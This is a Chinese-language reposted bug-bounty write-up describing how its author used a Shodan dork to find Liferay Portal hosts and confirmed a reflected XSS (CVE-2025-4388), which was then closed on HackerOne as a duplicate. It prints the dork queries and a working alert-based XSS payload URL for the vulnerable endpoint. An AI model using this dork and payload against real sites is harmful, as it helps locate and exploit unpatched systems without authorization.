尧图网站建设 尧图网络
  • 首页
  • 关于我们
  • 服务项目
  • 案例展示
  • 建站流程
  • 资讯中心
  • 联系我们
首页/资讯中心/详情

HackerOne上的CVE-2025-4388重复报告:一次五分钟的漏洞发现之旅

HackerOne上的CVE-2025-4388重复报告:一次五分钟的漏洞发现之旅
📅 发布时间:2026/6/22 23:53:03
本文作者分享了如何利用Shodan dork进行侦察,快速发现Liferay Portal的一个安全漏洞并提交给HackerOne的过程,最终报告因CVE已公开而被标记为重复,体现了在已知漏洞上挖掘机会的尝试。

CVE-2025-4388 HackerOne重复报告

Abhirup Konwar 关注
2 分钟阅读 · 2025年8月9日
3 分享

按下回车或点击以查看完整尺寸图片
图片由 Lee Jiyong 在 Unsplash 上发布
:backhand_index_pointing_right: 免费阅读

我对此并不感到难过,因为我觉得自己根本没花什么力气 :grinning_squinting_face: 我在5分钟内就完成了侦察和报告。

昨天,我在Medium上浏览一些关于使用Shodan进行真实发现的文章,然后我发现了下面这个:

"我问Shodan,它给了我一个赏金,说'当然,为什么不呢?' $"
medium.com

我从那篇文章中拿到了dork:
html:"liferayPortalCSS"

然后我筛选了我感觉可能拥有它的目标:
html:"liferayPortalCSS" ssl.cert.subject.cn:target.com
html:"liferayPortalCSS" hostname:target.com

我得到了一些结果,其中一个IP重定向到了目标的子域名。我注入了
/o/marketplace-app-manager-web/icon.jsp?iconURL=https:///%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E
然后它成功了,笑死…我立即报告了,尽管我知道公开的CVE很容易被重复报告。

最终,我得到了我事先预料到的东西。一记重复报告的耳光 :melting_face:
CSD0tFqvECLokhw9aBeRqqjH1LDrKjpa6GLzq6aSalGsg8UfEk4OcyD3NpZ9sLvIZm8cF0dymVhDnoTGO12u9BnAbWu8Y2aAyhNIERqNI7m9NzS5TWNs0fu7RafU9WC+
更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)

公众号二维码

公众号二维码

相关新闻

  • 如何用TensorFlow镜像实现自动化的模型版本管理
  • 轻量级部署也能高性能?TensorFlow Lite镜像应用场景解析
  • Open-AutoGLM移动端落地难题,3大关键技术突破揭秘

最新新闻

  • 3分钟部署FindSomething:重新定义网页信息安全的终极方案
  • 上海 GEO 服务商 TOP5 汇总:助力品牌抢占 AI 流量的核心服务商解析 - GEO优化
  • c语言用gcc编译过后,执行 ./hello.c 报错 ./hello.c: 权限不够
  • PUBG智能压枪工具终极指南:如何通过图像识别实现精准自动化控制
  • Python读取Java Properties文件的正确姿势
  • 如何免Steam客户端下载创意工坊模组:WorkshopDL完整指南

日新闻

  • 2026速览惠州叛逆青少年学校前十大排名名单出炉 - 武汉中职最新信息发布
  • 2026上饶白蚁消杀哪家好?15年本土2大权威白蚁防治公司推荐(金盾虫控/青蚁卫士) - 我叫一
  • 天龙八部单机版终极数据管理工具:5个技巧快速掌握游戏数据编辑

周新闻

  • Visual C++运行库修复终极指南:5分钟快速解决Windows软件启动错误
  • 手把手教你构建统计局地区经济数据爬虫:从环境搭建到数据持久化全指南
  • 2026多Agent深度解析:用AI团队替代单一模型,四种架构实战落地

月新闻

  • 【总结】入门篇:50句话让你记住架构核心概念
  • WeChatMsg技术方案解析:实现Mac微信数据自主管理的完整解决方案
  • WeChatMsg:革新性微信数据备份方案,打造你的专属数字记忆库

关于尧图

  • 公司简介
  • 团队介绍
  • 企业文化
  • 荣誉资质

服务项目

  • 定制开发
  • 电商建站
  • UI 设计
  • 运维服务

快速链接

  • 案例展示
  • 建站流程
  • 常见问题
  • 资讯中心

联系方式

  • 📍北京市朝阳区互联网产业园 A 座 10 层
  • 📞400-888-8888
  • ✉️contact@rkmt.cn
  • 🕐周一至周日 9:00-21:00

© 2024 北京尧图网络科技有限公司 版权所有 | 京 ICP 备 XXXXXXXX 号